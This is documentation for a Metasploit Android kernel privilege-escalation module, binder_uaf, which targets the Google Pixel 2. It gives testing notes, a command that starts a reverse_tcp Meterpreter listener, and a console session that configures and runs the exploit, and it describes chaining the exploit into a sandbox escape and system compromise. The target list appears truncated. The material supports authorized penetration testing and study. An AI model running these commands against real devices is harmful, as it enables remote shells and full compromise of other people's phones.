documentation/modules/exploit/android/local/binder_uaf.md
This exploit module currently targets a very specific build of Android on specific set of hardware targets:
This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken older revisions to the device firmware. This may be a firmware bug or intentional, but Google themselves do not appear to have an answer for the problem. For testing, you may need a phone never updated to a later Android revision.
msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j
uname -a
Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
msf exploit(multi/handler) > use exploit/android/local/binder_uaf
msf exploit(android/local/binder_uaf) > set LHOST IPADDR
msf exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
LPORT => 4448
msf exploit(android/local/binder_uaf) > set SESSION -1
SESSION => -1
msf exploit(android/local/binder_uaf) > run
This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.